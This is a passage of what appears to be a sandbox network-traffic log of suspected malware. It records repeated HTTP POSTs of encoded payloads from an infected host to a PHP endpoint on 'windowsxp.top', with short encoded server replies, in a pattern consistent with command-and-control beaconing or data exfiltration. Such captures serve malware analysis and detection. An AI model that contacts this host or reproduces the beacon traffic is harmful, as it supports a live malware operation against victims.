                                                                                                                  Oct 27, 2024 19:24:29.308504105 CET1012OUTData Raw: 55 50 58 59 5b 5c 56 57 54 58 57 54 54 57 5b 5b 59 5a 5b 50 52 57 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPXY[\VWTXWTTW[[YZ[PRWRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&.'5*>"5'94<_38/-<S*<U"2;X/#_)&,/!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:29.568263054 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:29.773999929 CET771INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmBWKOq7HPoRtaqCZ4%2FOWwsQ0hh%2FcnWPboVAwU%2Fj5xb0ktHQ%2BxWhWrRvUDmHqpKQzBXLi8iBbJTe7p43WJ4VpNgNWmDHl0dXyzX1hwgtyypWpcV%2FXLKQ2xLwtZSik%2BOD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9286a06ddaf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=983&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1426600&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:24:29.774049044 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  117192.168.2.450130188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:30.058643103 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:30.414948940 CET1012OUTData Raw: 55 56 5d 5b 5e 5f 56 56 54 58 57 54 54 56 5b 5c 59 5a 5b 51 52 52 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UV][^_VVTXWTTV[\YZ[QRRR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&,Y5*5P'.#'8T/.(S)U7'Y8-7^>,)-/!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:30.670496941 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:30.973568916 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9%2BRZSEqSdS4vkjQwPOvi%2BiMGFJySdXrqzlyQypL97wysR0kHEKzKkZD28NbXTQFkUuktBtPgUgQ0T5sJ%2FoPmNrxEVjHxR0MmMw18OrEfkKCR66d8CBmW0YmkP1Ux44B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b92f4f374768-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1330882&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  118192.168.2.450131188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:31.106937885 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:31.462114096 CET1012OUTData Raw: 50 55 58 59 5e 58 56 50 54 58 57 54 54 5d 5b 52 59 5e 5b 5e 52 56 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUXY^XVPTXWTT][RY^[^RVR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%=#"\%Y554Z.7<0+;,)4#'_,_>*.!Y##X(
                                                                                                                  Oct 27, 2024 19:24:31.709080935 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:31.919259071 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yDsZbrNCxqVDHfzERt%2B9xOvIsFt9WqHVHSfO0S7uhgg1xj4OKtbmf5gWoW28KcPJF2kJwTko%2BmBru4LG2o8EwDDiAFALTWqFBjnv%2BghXY%2F0G0Fo7vBIPSo77EAVDOjt4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b935c83c474b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1210&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1271290&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  119192.168.2.450132188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:31.224231005 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:31.587496996 CET1716OUTData Raw: 50 51 58 5e 5b 58 53 50 54 58 57 54 54 56 5b 53 59 59 5b 50 52 51 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQX^[XSPTXWTTV[SYY[PRQRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'%,"*)^"4,'3'3;X?(, V7"'_/'X):X-!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:31.826196909 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:32.047009945 CET923INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OD%2FeJFG2QLA4Ddk%2BEE0g3zR%2F1vc1Gjh1CbSGX8MxxWLSGCi2iIhRkOaPooc3lgTYwMXfDpr6FpeCETctDpeVQ0sV8yjIqXWPKMUbjfRCm7UxZS7Xwhiytzm1%2BOXpoHVp"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9368a5da915-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1266841&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5c 37 2e 0d 0d 28 2c 00 09 3e 1f 0f 5f 24 02 0b 5a 38 1c 30 1c 3e 03 1b 1f 39 16 3e 55 24 24 3a 1a 29 39 3b 01 23 58 2b 0d 3e 35 21 5e 00 1c 27 5f 20 3e 21 56 31 15 02 17 27 20 0e 5f 21 13 37 14 2a 2d 39 1c 3c 39 2f 07 3c 28 27 54 38 3f 0b 57 27 29 26 5e 3b 5e 29 07 28 10 2a 54 0c 14 21 5b 2e 2c 3f 07 35 31 13 56 3d 22 38 58 24 07 30 15 24 04 24 56 3f 05 20 07 3f 04 22 02 21 12 34 1f 2b 28 3a 5c 24 3d 37 5b 29 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"\7.(,>_$Z80>9>U$$:)9;#X+>5!^'_ >!V1' _!7*-9<9/<('T8?W')&^;^)(*T![.,?51V="8X$0$$V? ?"!4+(:\$=7[)."T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  120192.168.2.450133188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:32.043570995 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:32.399358988 CET1012OUTData Raw: 55 5a 5d 58 5e 52 53 53 54 58 57 54 54 53 5b 58 59 59 5b 5d 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]X^RSSTXWTTS[XYY[]R^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&X4X6:X#&,9'(#;U)<74;[;'*>9!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:32.656481028 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:32.864372969 CET784INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X9Wtl%2Bk2c2tfKx2kXo8%2FqeFXraa6%2FI9ZThE9%2BXKngyHxNweZqLz%2BAT%2BDeIrDOgbBurhEOBFZ6a3Krp7KrRCMUbTLReop%2Br%2FsTd1Z%2F7dbYzdYq3xTK6eIEjxogxEUh9bk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b93bb9dee86f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1299820&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  121192.168.2.450134188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:33.030313969 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:33.383840084 CET1012OUTData Raw: 55 56 58 5b 5e 53 53 54 54 58 57 54 54 56 5b 59 59 5d 5b 5e 52 57 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX[^SSTTXWTTV[YY][^RWR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%.36)!4-7,0;(T8= )/( 1'Y8=0)&Y,/!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:33.634983063 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:33.834570885 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BsvjnfqHVrywqF7YZKeUD26ZIYWGlVEMshZf3UO%2BJxgH7MfqCvLMV%2BGMbHiYtJyIFa8hUU%2F1yka5mILsk4M%2FSdSmRbjLpA832vN%2FnWoCImKmAcIwNrWS87zZug3iTrg0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b941dae20bb8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1285&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1122480&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  122192.168.2.450135188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:33.964167118 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:34.321176052 CET1012OUTData Raw: 50 56 58 55 5e 5b 56 52 54 58 57 54 54 50 5b 5b 59 58 5b 5f 52 53 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXU^[VRTXWTTP[[YX[_RSR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%>7"5]5P(_:'<0;>,W=/,4T?_,-7=&,?!Y##X(7
                                                                                                                  Oct 27, 2024 19:24:34.591531038 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:34.814537048 CET786INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MzlYLoB1PTDySla6WwjG4ER7Y%2B6%2FP9xDK5rdi28rsDpEBCo%2FKMlIuJ%2BHAcKSbm%2FhbVo%2F7LGqx224FUiMfC%2FFjFj33qBPXge8SDz8fgdPdQbIxmBFPmG%2FJ2qmDqX0%2Fkk%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b947c9904864-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1119876&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  123192.168.2.450136188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:34.956835032 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:35.305845022 CET1012OUTData Raw: 50 50 58 5a 5b 5b 56 57 54 58 57 54 54 53 5b 58 59 5b 5b 59 52 5e 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXZ[[VWTXWTTS[XY[[YR^R]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2>75:56$\.#$^ T/'*#T38=4>?"Y-!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:35.560169935 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:35.838161945 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZCOLWcHc7KgKLRVEYlAsOVa1VcvkVcRRqudbI5tA2%2FP7RD07rvEnIE3Ra8yeJZwEfjerHyKHIyJp%2FeN%2B%2BQxlc9nRSXz2MyyLeyeJ5x9TZ%2BJQfL5s99lWNu2jS85%2Fm9z"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b94ddd3de546-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1211715&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0
                                                                                                                  Oct 27, 2024 19:24:35.838184118 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZCOLWcHc7KgKLRVEYlAsOVa1VcvkVcRRqudbI5tA2%2FP7RD07rvEnIE3Ra8yeJZwEfjerHyKHIyJp%2FeN%2B%2BQxlc9nRSXz2MyyLeyeJ5x9TZ%2BJQfL5s99lWNu2jS85%2Fm9z"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b94ddd3de546-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1211715&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  124192.168.2.450137188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:35.992871046 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:36.352576971 CET1012OUTData Raw: 50 56 5d 5b 5e 5f 53 52 54 58 57 54 54 56 5b 5f 59 5e 5b 51 52 56 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV][^_SRTXWTTV[_Y^[QRVRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&X4[!:56&4_9$'($8>;)<(V#!3/'>,!-/!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:36.597033978 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:36.890199900 CET767INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zd9t7cUSijzVXyteJXcqBZ7yyXCyvCJGsCJs6dYuL4QS5ubi0AXS1K5icLztvaFs0O7AgktrId3BTvHys5tQ7YuwF3rAinSR7aTv1B8Gh2vbl6OSmJs%2F8dnzwCrtlHqt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9545d284787-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1804&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=824601&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
